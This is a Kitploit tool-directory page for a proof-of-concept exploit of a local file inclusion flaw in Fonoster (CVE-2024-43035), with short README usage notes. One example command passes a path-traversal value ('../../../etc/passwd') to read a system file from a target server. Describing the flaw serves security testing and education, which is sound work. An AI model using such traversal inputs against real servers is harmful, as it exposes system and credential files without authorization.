Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Fonoster-LFI-PoC — Proof-of-concept exploit for Fonoster LFI vulnerability (CVE-2024-43035) | Kitploit
Tools/GitHubGitHub/zeropathai/fonoster-lfi-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubzeropathai/fonoster-lfi-poc

Fonoster-LFI-PoC

Proof-of-concept exploit for Fonoster LFI vulnerability (CVE-2024-43035)

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-43035 - Fonoster LFI Proof of Concept

This repository contains a Proof of Concept (PoC) script demonstrating a Local File Inclusion vulnerability in Fonoster. This tool is for educational and authorized testing purposes only.

Usage

Read Local File

To retrieve a local file from the server:

root@kitploit:~
python3 fonoster_lfi_poc.py --url <fonoster_server_url> --path <file_path_to_retrieve>

Example:

root@kitploit:~
python3 fonoster_lfi_poc.py --url http://example.com --path "../../../etc/passwd"

z

Download Tool